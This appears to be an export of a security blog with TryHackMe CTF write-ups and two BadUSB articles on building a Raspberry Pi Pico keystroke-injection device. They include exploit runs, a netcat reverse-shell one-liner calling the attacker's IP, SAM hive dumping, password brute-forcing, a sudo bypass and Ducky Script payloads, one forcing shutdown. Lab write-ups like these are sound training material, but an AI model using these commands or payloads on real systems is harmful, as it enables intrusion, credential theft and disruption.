browser:\nhttp://10.10.50.173The page loads — but it’s blank or just shows a generic page. Nothing to work with in the UI.\nInspect the HTML/JS — but there’s nothing significant to grab on to.\nTime for deeper recon.\nSo we Scan the target\nnmap -O -sV 10.10.50.173and from the result we see this :\n80/tcp open httpPHP cli server 5.5 or later (PHP 8.1.0-dev)\nThat PHP 8.1.0-dev version is here. Let’s see if there’s an exploit.\nNow going to the browser I search up: PHP 8.1.0 exploit and I find it on exploit db\nOffSec's Exploit Database ArchivePHP 8.1.0-dev - 'User-Agentt' Remote Code Execution.. webapps exploit for PHP platformwww.exploit-db.comIt’s a Remote Code Execution (RCE) exploit that abuses the insecure User-Agent header handling in this PHP dev server.\nThen back to our terminal we create an empty file and copy the exploit and paste it there\nnano agenttexp.pyBefore you can run it, you need to give it execute permission\nchmod +x agenttexp.pyThe chmod makes the file executable, allowing you to run it like a program or script.\nNow run the exploit:\npython3 agenttexp.pyIt asks for the target URL:\nwe paste it in:\nhttp://10.10.50.173/Boom — shell access granted!\nNow we try this :\npwdls -laNothing useful in the current directory.\nSo we explore the root directory:\nls /and flag.txt catches my eyes\nNow you may wonder why ls/ ?\nls -la lists files in your current directory only.ls / shows the top-level directory structure — i.e., files and folders in /, the root.Unless you’re already in /, you won’t see flag.txt with ls -la\nOnce we know the flag is in /, we use\ncat /flag.txtand get the flag:\nflag{4127d0530abf16d6d23973e3df8dbecb}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"15 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/agent-t-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"AGENT T-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Blueprint” BLUEPRINT — THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Blueprint”\nThis room is classified. It took me a bit to complete and was a fun room, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nAs the victim IP shows a negative website\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a web page with some image and text.\nI initiate an Nmap scan and run a Feroxbuster scan\nnmap 10.10.66.49 -Oferoxbuster -u http://10.10.66.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtNo fruitful results from Ferox, but browsing manually under 8080 reveals a directory of files.\nhttp://10.10.66.49:8080Click around and look through the available documentation. One term stands out:\nosCommerce\nA quick Google search confirms: osCommerce 2.3.4 is vulnerable to Remote Command Execution (RCE).\nFound this GitHub repo for the exploit:\nGitHub - nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution: osCommerce 2.3.4 Remote Command…osCommerce 2.3.4 Remote Command Execution. Contribute to nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution…github.comFirst, clone the repository:\ngit clone https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution.gitcd osCommerce-2.3.4-Remote-Command-ExecutionBased on the GitHub README, target the /catalog/ subdirectory.\nRun the exploit with:\npython3 osCommerce2_3_4RCE.py http://10.10.66.49:8080/oscommerce-2.3.4/catalog/Command prompt appears. Try:\nwhoamiNow, Generate a PowerShell reverse shell payload using RevShells:\nChoose: PowerShell Base64 (PowerShell v3)Replace IP with your local tun0 IPChoose a port (e.g., 4445)Start a listener:\nnc -lvnp 4445Paste the generated reverse shell payload into the RCE shell.\nBoom — shell connected.\nUse cd .. repeatedly to reach the base drive, then:\ncd Userscd Administratorcd Desktopcat root.txt.txtThen we get the Flag:\nTHM{aea1e3ce6fe7f89e10cea833ae009bee}You’re on a Windows machine, and Windows stores password hashes in the registry under:\nC:\\Windows\\System32\\config\\SAMC:\\Windows\\System32\\config\\SYSTEMWe’re going to dump these keys using reg save via RCE:\ncd Xamppcd htdocscd oscommerce-2.3.4reg save HKLM\\SAM sam.hivreg save HKLM\\SYSTEM system.hivNow browse to the /oscommerce-2.3.4/ directory from the browser to download both files.\nMove into your download folder and run:\nsamdump2 system.hiv sam.hivOutput:\naad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450\nThe left hash is a blank LM hashThe right one is the NTLM hashCrack it on CrackStation or using John:\n30e87bf999828446a1c1209ddde4c450 → googleplusgoogleplusConclusionI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"10 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/blueprint-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BLUEPRINT — THM CTF — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Lazy Admin.” Lazy Admin— TryHackMe — CTF WriteupHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Lazy Admin.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nLet’s start with basic service detection and directory brute-forcing:\nnmap 10.10.61.218 — openOpen ports:\n22 (SSH)80 (HTTP)Now let’s enumerate web directories\nferoxbuster -u http://10.10.61.218/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtDiscovered:\n/content/content/imagesWe visit /content and recognize the SweetRice CMS UI.\nSweet!\nNow time to dig into it :\nffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.10.61.218/content/FUZZFindings:\n/inc directory has a SQLite DB fileDownload and inspect:\nwget http://10.10.61.218/content/inc/config.dbOpen it in Mousepad or any SQLite browser. Use Ctrl+F to find credentials.\nFound this in the DB:\nadmin\\”;s:7:\\”manager\\”;s:6:\\”passwd\\”;s:32:\\”42f749ade7f9e195bf475f37a44cafcb\nThe Hash type is : MD5\nCrack it on crackstation.net → Password123\nCredentials:\nUsername: managerPassword: Password123Now time to use reverse shell :\nTo send it as a php5 file we rename it:\nmv php-reverse-shell.php php-reverse-shell.php5Search for known exploit:\nsearchsploit sweetricewe use:\nSweetRice 1.5.1 — Arbitrary File Upload — php/webapps/40716.pyCopy and run it:\nsearchsploit -m php/webapps/40716.pypython3 40716.pyEnter the following when prompted:\nURL: http://10.10.61.218/content/User: managerPass: Password123Shell file: php-reverse-shell.php5In a new terminal, opening listner:\nnc -lvnp 1234Now trigger the shell by visiting:\nhttp://10.10.61.218/content/attachment/php-reverse-shell.php5\nBOOM! — We have the shell\nNow :\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’Breakdown:\nUsed to upgrade a limited shell to a fully interactive TTY, enabling all featurespython3 -c: Runs Python code passed as a string.import pty: Loads the pty module (used for pseudo-terminals).pty.spawn(\"/bin/bash\"): Spawns a fully interactive Bash shell.Next searching for the user flag:\ncd /homecat user.txtNow escalating the privileges:\nsudo -lOutput:\n(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl\nCheck the contents:\ncat /home/itguy/backup.pl\nOutput:\n#!/usr/bin/perlsystem(“sh”, “/etc/copy.sh”);\nThen:\ncat /etc/copy.sh\nIt already has a reverse shell format. Replace with your own IP:\necho ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 10.x.x.xxx 5554 \u0026gt;/tmp/f’ \u0026gt; /etc/copy.shNow settign up the listner:\nnc -lvnp 5554Now run the Perl script:\nsudo /usr/bin/perl /home/itguy/backup.plBOOM! we are root\ncd /rootcat root.txtTHM{63e5bce9271952aad1113b6f1ac28a07}THM{6637f41d0177b6f37cb20d775124699f}CONCLUSION :I hope this write-up walkthrough was helpful to you all! This room covered CMS Enumeration, Authenticated file upload exploit and SSH Privilege Escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"8 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/lazy-admin-tryhackme-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Lazy Admin— TryHackMe — CTF Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent Sudo.” Agent Sudo— TryHackMe — CTF WriteupHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent Sudo.”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start with the nmap scan:\nnmap 10.10.132.168 — openThe Open ports:\n21 (FTP)22 (SSH)80 (HTTP)Webpage loads but isn’t helpful up front — mentions codenames and agent themes.\nLet’s scan with feroxbuster:\nferoxbuster -u http://10.10.132.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtNothing useful, so let’s try header injection on the homepage using BurpSuite\nCapture the request to / and add a header in the User-Agent field using Burp Repeater:\nUser-Agent: CMessage received:\nAgent name: ChrisWeak password warningNext we try FTP using this :\nTry anonymous login first → fails.\nUse Hydra to brute-force FTP creds for user chris:\nhydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.132.168Cracked:\nUsername: chrisPassword: crystalNow let’s log in:\nftp 10.10.132.168Get these files:\nTo_agentJ.txtcutie.pngcute-alien.jpgNow we analyze the content of the files:\ncat To_agentJ.txt{Gives a hint that Agent J (james) has sensitive data}\nI even check the steganography on the jpg:\nsteghide — info cute-alien.jpgIt’s password-protected. Use stegseek with rockyou.txt\nstegseek cute-alien.jpg /usr/share/wordlists/rockyou.txtPassphrase: Area51\nOutput file: cute-alien.jpg.out\ncat cute-alien.jpg.outFound credentials:\nUsername: jamesPassword: hackerrules!Now to analyze cutie.png , we run binwalk:\nbinwalk -e cutie.png — run-as=rootcd _cutie.png.extracted/We find a zip file (8702.zip). Crack it:\n7z e 8702.zipSince it is Password protected → we crack using john\nzip2john 8702.zip \u0026gt; hashjohn hash — wordlist=/usr/share/wordlists/rockyou.txtPassword: alien\nNow accessing James through SSH :\nssh james@10.10.132.168Use password: hackerrules!\nGet user flag:\ncat user.txtNext we analyze the image :\nscp james@10.10.132.168:Alien_autopsy.jpg ~/Downloads/Search the image online — identifies as the Roswell alien autopsy photo, hinting at cover-up themes and classic alien conspiracy.\nNow privilege Escalation :\nCheck sudo permissions:\nsudo -lOutput:\n(ALL, !root) /bin/bash\nThis is vulnerable to CVE-2019–14287 — user can bypass root restriction using -u#-1\nsudo -u#-1 /bin/bash -iBoom!\ncd /rootcat root.txtAgent name: DeskelFlags:\nB03d975e8c92a7c04146cfa7a5a313c7Roswell alien autopsyCVE-2019–14287B53a02f55b57d4439e3341834d70c062DesKelCONCLUSION :I hope this write-up walkthrough was helpful to you all! This room covered FTP Enumeration, Password Hash Cracking, and SSH Privilege Escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"3 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/agent-sudo-tryhackme-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Agent Sudo— TryHackMe — CTF Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Gotta Catch’em All!” GOTTA CATCH’EM ALL — TRY HACK ME — ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Gotta Catch’em All!”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 15minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThrowing Bullets not PokeBallsWe start by checking the page out and it’s a basic default Apache page\nWe try using feroxbuster but there is no positive result\nAnd At the same time:\nnmap 10.10.0.73 — openResults:\nPort 22 (SSH)Port 80 (HTTP)Now Let’s go back and take a look at the web interface.\nAfter seeing no result on the webpage we check the dev tools and see something :\n👀 Console Hint: A bunch of Pokémon names and a line like this:\n\u0026lt;some_pokemon\u0026gt;:\u0026lt;hack_the_pokemon\u0026gt;\nAlso, an IP \u0026amp; port string: 10.10.0.73:202:14—likely red herring, because port 202 and 14 aren’t open.\nBut the format username:password gives us what we need!\nFrom the hint, we get:\nUsername: pokemonPassword: hack_the_pokemon\nTry logging in:\nssh pokemon@10.10.0.73Success! You’re in as user pokemon\nwe perform ls -la*\npokemon@root:~$ ls -la *\n-rw-r--r-- 1 pokemon pokemon 8980 Jun 22 2020 examples.desktop\nDesktop:\ntotal 12\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 24 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\n-rw-rw-r-- 1 pokemon pokemon 383 Jun 22 2020 P0kEmOn.zip\nDocuments:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nDownloads:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nMusic:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nPictures:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nPublic:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nTemplates:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nVideos:\ntotal 12\ndrwxr-xr-x 3 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\ndrwxrwxr-x 3 pokemon pokemon 4096 Jun 22 2020 Gotta\nNow to get the flags, first grass type :\ncd Desktopunzip P0kEmOn.zipcd P0kEmOncat grass-type.txtHex Encoded:\n50 6f 4b 65 4d 6f 4e 7b 42 75 6c 62 61 73 61 75 72 7d\nDecode using any hex tool\nPoKeMoN{Bulbasaur}To make it easier we try searching and finding the other type of files:\nfind / -name “*-type.txt” 2\u0026gt;/dev/nullwe get:\n/var/www/html/water-type.txt/etc/why_am_i_here?/fire-type.txt\nSo for water type pokemon:\ncd /var/www/htmlcat water-type.txtResult:\nEcgudfxq_EcGmP{Ecgudfxq}\nLooks like ROT13\nUse dcode.fr or similar tool → Decode ROT13\nSquirtle_SqUaD{Squirtle}Next fire type:\ncd /etc/why_am_i_here?cat fire-type.txtUDBrM20wbntDaGFybWFuZGVyfQ==\nI immediately know it’s base 64\nP0k3m0n{Charmander}Now privilege escalation — Let’s figure out who the root user could be…\nExploring the user’s folders:\ncd Videos/Gotta/Catch/Them/ALL!lswe see a suspicious file:\nCould_this_be_what_Im_looking_for?.cplusplus\nI inspect it :\ncat Could_this_be_what_Im_looking_for?.cplusplusC++ snippet output appears:\nstd::cout \u0026lt;\u0026lt; “ash : pikapika”And that is our creds for root\nAs we know ASH is the other user so time to switch into him\nsu ashPassword: pikapikaOnce in,\nsudo sucd /rootcat roots-pokemon.txtBOOM!\nFinal Flag is found:\nPikachu!CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nThis was a relatively easier room.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/gotta-catch-em-all-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"GOTTA CATCH’EM ALL — TRY HACK ME — ROOM","type":"writeups"},{"content":" What is Pico Bad USB? Introduction to Basics of Bad USBWhat is Pico Bad USB?The Raspberry Pi Pico is a small and inexpensive microcontroller with USB functionality, which can be easily programmed to emulate different types of USB devices like keyboards or mice.\nThis ability allows the Raspberry Pi Pico to behave like a malicious USB device when plugged into a computer.\nOnce connected, the Pico can automatically execute pre-programmed actions, such as running commands, opening applications, or modifying system settings.\nHow Does Pico Bad USB Work?USB Emulation: The Raspberry Pi Pico, with its USB host capability, can be programmed to emulate various USB devices like a keyboard, mouse, or even a storage device. When plugged into a computer, it tricks the system into thinking it is a legitimate device.Payload Execution: Once the Pico is connected, the script or payload stored in its memory is triggered. For example, it could simulate pressing specific keys to open a terminal or command prompt and execute a series of commands. These commands can range from harmless tasks (like opening applications) to malicious actions (like creating new system users or running malware).Autonomous Operation: Since the Raspberry Pi Pico is programmable, it operates autonomously once plugged into the system. There’s no need for the user to do anything beyond inserting the USB device. It begins executing its payload automatically, without any prompts or warnings to the user.System Manipulation: The commands or actions triggered by the payload can vary depending on the attacker’s goals. For instance:Keystroke Injection: The Pico might simulate keyboard input to execute commands, install malware, or open applications.Mouse Movements: It could simulate mouse movements and clicks to interact with the system’s interface without the user’s knowledge.Command Execution: It could open a terminal or command prompt and run malicious scripts or commands on the system.The Logic Behind Pico Bad USBThe logic of Pico Bad USB is based on exploiting the USB Human Interface Device (HID) protocol.\nThe HID protocol is commonly used for devices like keyboards, mice, and game controllers.\nThe Raspberry Pi Pico can be programmed to emulate these HID devices, and because HID devices are trusted by operating systems, they are granted permissions to execute commands without user intervention.\nThe core logic behind a Bad USB attack using the Pico works as follows:\nThe Pico is plugged into the target system as a USB device.The Pico’s firmware is programmed with a series of commands (a payload).Once connected, the payload is executed automatically.The payload sends instructions to the operating system (e.g., through keystrokes or mouse movements) to perform actions such as opening a terminal, running commands, or interacting with the system.The system follows these instructions without question, as it assumes the inputs are coming from a legitimate USB device.Some Simple Educational PayloadsTo find the system infoDELAY 500WINDOWS rDELAY 500STRING cmdENTERDELAY 1000CTRL-SHIFT ENTERDELAY 2000STRING systeminfoDELAY 1000ENTERDELAY 500: Wait 0.5 seconds (to ensure the system is ready).WINDOWS r: Simulates pressing Windows + R, which opens the Run dialog.DELAY 500: Wait another 0.5 seconds (to ensure the Run window is open).STRING cmd: Types \"cmd\" into the Run dialog.ENTER: Simulates pressing Enter, which opens Command Prompt in normal mode.DELAY 1000: Wait 1 second.CTRL-SHIFT ENTER: Simulates pressing Ctrl + Shift + Enter, which is a shortcut to run a program (like CMD) as an administrator.DELAY 2000: Wait 2 seconds to allow the User Account Control (UAC) prompt to appear (though actual elevation may require manual approval).STRING systeminfo: Types the command systeminfo, which displays detailed configuration info about the computer.DELAY 1000: Waits 1 second before proceeding.ENTER: Executes the systeminfo command, listing OS version, BIOS version, RAM, etc.2. Open Powershell\nDELAY 500GUI r DELAY 500STRING powershell ENTERDELAY 500STRING Get-ProcessENTERWaits 0.5 seconds before starting (to ensure system readiness)GUI r: Simulates pressing Windows + R to open the Run dialog.DELAY 500:Waits 0.5 seconds for the Run window to appear.STRING powershell:Types powershell into the Run dialog box.ENTER: Presses Enter launches PowerShell in standard (non-admin) mode.DELAY 500:Waits 0.5 seconds for PowerShell to fully open.STRING Get-Process:Types the PowerShell command Get-Process, which lists all running processes.Enter: Executes the command in PowerShell, showing active processes (similar to Task Manager).3. The next is a fun one which I worked on and it is to shutdown systems:\nDELAY 500WINDOWS rDELAY 500STRING cmdENTERDELAY 1000CTRL-SHIFT ENTERDELAY 3000STRING echo “Thanks from 5kullk3r! Entering shutdown”ENTERDELAY 500STRING shutdown /s /f /t 5ENTERDELAY 500:Waits 0.5 seconds to ensure the system is stable before executing actions.WINDOWS r:Presses Windows + R to open the Run dialog.DELAY 500:Waits 0.5 seconds for the Run dialog to appear.STRING cmd:Types cmd to launch Command Prompt.ENTER:Presses Enter to open the Command Prompt.DELAY 1000:Waits 1 second for CMD to load.CTRL-SHIFT ENTER:Attempts to launch Command Prompt as administrator.DELAY 3000:Waits 3 seconds to allow for UAC handling and CMD to load in admin mode.STRING echo \"Thanks for using! Entering self-destruct mode...\":Types a message to display to the user.ENTER:Executes the echo command, printing the message to the console.DELAY 500:Waits 0.5 seconds before the next command.STRING shutdown /s /f /t 5: Types a shutdown command:/s – shuts down the computer,/f – forces running applications to close,/t 5 – sets a 5-second countdown before shutdown.ENTER:Executes the shutdown command.DisclaimerThis is a personal project created for my own learning and exploration, shared solely for educational and research purposes.\nIt reflects my individual journey in cybersecurity and aims to promote ethical practices.\nAll content is provided for educational use only and must not be used for unauthorized, malicious, or illegal activities.\nIf you choose to use this material, you are solely responsible for ensuring your actions are legal, authorized, and ethical.\nI assume no responsibility or liability for any consequences resulting from the misuse or improper application of this content.\nCONCLUSION :I hope this write-up walkthrough was helpful to you all! This small article talked about rubber ducky and a few basic scripts\nI will be back with the rooms from the coming week. If you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"27 May 2025","externalUrl":null,"permalink":"/articles/technisch/introduction-to-basics-of-bad-usb/","section":"Security Research \u0026 Articles","summary":"","title":"Introduction to Basics of Bad USB","type":"articles"},{"content":"","date":"27 May 2025","externalUrl":null,"permalink":"/articles/technisch/","section":"Security Research \u0026 Articles","summary":"","title":"Technische Arbeit","type":"articles"},{"content":" Disclaimer Trusting the Wrong Device — A Hands-On Cybersecurity BreakdownDisclaimerThis is a personal project created for my own learning and exploration, shared solely for educational and research purposes.\nIt reflects my individual journey in cybersecurity and aims to promote ethical practices.\nAll content is provided for educational use only and must not be used for unauthorized, malicious, or illegal activities.\nIf you choose to use this material, you are solely responsible for ensuring your actions are legal, authorized, and ethical.\nI assume no responsibility or liability for any consequences resulting from the misuse or improper application of this content.\nHUMAN INTERFACE DEVICESIn January 2022, the FBI issued an urgent security alert regarding a new campaign by the infamous cybercrime group FIN7.\nFIN7 groupThe group was conducting a physically distributed USB-based attack, mailing malicious flash drives directly to employees at U.S. defense contractors, transportation companies, and insurance providers.\nThese weren’t ordinary thumb drives.\nBest Buy gift card containing a malicious USB deviceThe packages were professionally crafted — complete with fake Amazon and Best Buy branding, sometimes including congratulatory letters, thank-you notes, or even phony COVID-19 guidelines.\nThe goal? Social engineering: to make the target feel safe enough to plug it in.\nBut once inserted, the USB device didn’t behave like storage — it acted as a keyboard, leveraging the BadUSB exploit technique.\nThe same model in the above pictureIt instantly began typing out malicious PowerShell commands that:\nDownloaded and installed malware,Opened backdoor access for the attackers,In some cases, triggered ransomware deployments.The devices were configured to bypass endpoint protection by avoiding file-based malware altogether. Because the attack originated from a device posing as a trusted Human Interface Device (HID), most antivirus systems didn’t flag it at all.\nThe outcome?\nSeveral organizations experienced system compromises, malware infections, and ransomware deployment — all from a USB drive that no one thought twice about.\nThis wasn’t a phishing link.It wasn’t a zero-day exploit.It was a keyboard hidden inside a USB stick — a $5 piece of hardware designed to look harmless, but capable of devastating impact.\nThis is the essence of BadUSB — an attack that targets human trust and hardware assumptions.\nAnd after reading about this, I wanted to go deeper. I wanted to see just how easy it is to craft and use one.\nINTRODUCTION:BadUSB attacks highlight a serious vulnerability in the way computers trust USB devices.\nThese attacks rely not on malware files, but on malicious firmware that can turn an ordinary-looking USB device into a stealthy attack tool.\nCurious to explore this threat firsthand, I began researching BadUSB options — but most were either too expensive or overly complex for a beginner.\nAfter some digging, I discovered a budget-friendly alternative: the Raspberry Pi Pico.\nRaspberry Pi PicoPaired with the open-source Pico-Ducky project, I was able to build a fully functional BadUSB device that emulates a keyboard and executes scripted payloads.\nThis article walks through how I created it, what it can do, and why such a low-cost tool underscores the growing accessibility of hardware-based attacks.\nWHAT IS A BAD USB ?Common TrendsBadUSB is a class of attack that exploits the trust your computer places in USB devices.\nRather than carrying malware in storage, a BadUSB attack modifies the firmware inside the device itself — changing its identity to something far more dangerous.\nThe most common payload? A USB that emulates a keyboard and starts typing commands the moment it’s plugged in.\nNo clicking, no prompts, no warnings — just immediate execution.\nBecause:\nOperating systems trust keyboards by default,Most endpoint protection tools don’t monitor HID behavior,And the attack requires no user interaction at allWhy Is BadUSB So Dangerous?Invisible Execution: No files = no scanning = no alertsCross-Platform: Works on Windows, macOS, Linux — even locked systemsOS Trust: Keyboards are inherently trusted by your deviceCheap to Build: Anyone can do it with $5–$10 in hardwareInstant Payload: Execution begins milliseconds after insertionAnd the biggest risk? Human behavior.Curiosity, convenience, and unawareness make it devastatingly effective.\nMy Hands-On BadUSB BuildTo understand the threat more deeply, I built a functioning BadUSB device using a Raspberry Pi Pico microcontroller and the open-source Pico-Ducky project.\nThis device emulates a keyboard, reads Ducky Script payloads, and can be customized based on the needs.\nWhat I UsedRaspberry Pi Pico ($4–$6)Micro-USB cableWindows laptop (for demo)CircuitPython 9.2.1Pico-Ducky GitHub codeAdafruit CircuitPython Libraries (v9.x)Step-by-Step Guide:To start off just plug the pico through the cable to your system and this is what you should seeStep 1: Download Firmware and LibrariesVisit Pico-Ducky on GitHub → Download ZIPScroll down and find installation instructionsClick the CircuitPython link: Raspberry Pi Pico UF2 FirmwareDownload the .UF2 firmware fileAlso download: Adafruit CircuitPython Bundle 20250509Step 2: Prepare FilesCreate a folderPlace the UF2 firmware and both ZIP files inside itExtract both ZIPsStep 3: Flash the PicoHold the BOOTSEL button (little white button)while plugging in the PicoIt mounts as RPI-RP2Drag and drop the .UF2 file onto itIt reboots as CIRCUITPYStep 4: Load Code and LibrariesOpen the extracted Adafruit zip → /lib/\nCopy these libraries to Pico’s /lib/:\nadafruit_hidadafruit_wsgiasyncioadafruit_debouncer.mpyadafruit_ticks.mpyAND\nFrom pico-ducky, copy the following files to Pico root:\nboot.pycode.pyduckyInPython.pywebapp.pywsgiserver.pyStep 5: Write a PayloadHere this is a basic paylod to show the system information that I tried:\nOpen NotepadEnter this Ducky Script:DELAY 500WINDOWS rDELAY 500STRING cmdENTERDELAY 1000CTRL-SHIFT ENTERDELAY 2000STRING systeminfoDELAY 1000ENTERdecoding the ducky script :\nDELAY 500// Wait for 0.5 seconds after the device is plugged in to ensure the system is ready.WINDOWS r// Opens the Windows Run dialog by pressing Windows + R.DELAY 500// Short pause to allow the Run dialog to appear.STRING cmd// Types “cmd” into the Run dialog to launch the Command Prompt.ENTER// Presses Enter to execute the command.DELAY 1000// Waits 1 second for the Command Prompt to open.CTRL-SHIFT ENTER// Presses Ctrl + Shift + Enter to launch the Command Prompt with administrator privileges (UAC elevation).DELAY 2000// Waits 2 seconds to allow the UAC prompt to appear and be accepted (assumes the user presses ‘Yes’).STRING systeminfo// Types “systeminfo”, a Windows command that displays detailed system information.DELAY 1000// Short pause to ensure the command is registered properly.ENTER// Executes the “systeminfo” command.Save as payload.dd → File type: All FilesStep 6: Test ItUnplug the PicoPlug it back inWatch CMD open and auto-type your payload in real-timeAnd, these are the files that should be presentVerify if these files are presentReal-World BadUSB AttacksStuxnet (2007–2010)The infamous U.S.–Israeli cyberweapon used to damage Iran’s nuclear centrifuges was delivered via USB to an air-gapped network. It exploited human behavior, bypassed physical isolation, and caused physical destruction — all from a flash drive.\nFIN7 Mail Campaign (2022)The FIN7 gang sent infected USBs in fake Amazon/Best Buy packages. Once inserted, the drive launched ransomware and remote access malware using HID emulation.\nMelbourne USB Drop (2016)Unmarked USB sticks were dropped into people’s mailboxes in suburban Australia. When plugged in, they auto-installed malware under the guise of a media player.\nHow to Protect Against BadUSB AttacksTechnical DefensesDisable unused USB ports via BIOS or Group PolicyUse endpoint protection tools with USB device controlWhitelist known USB devices onlyMonitor USB events using a SIEM solutionRestrict HID devices on locked systemsUser AwarenessNever plug in an unknown or unsolicited USB driveAvoid accepting “promotional USBs” from events or mailTrain employees using simulated USB drop testsUse USB data blockers when charging in public placesConclusionBadUSB isn’t just a concept — it’s a silent, low-cost attack method disguised as everyday hardware.\nWith a $5 board and some open-source code, I built a functioning device in under 30 minutes.\nWhat I made was simple and purely for learning, but far more sophisticated versions are out there.So the next time you 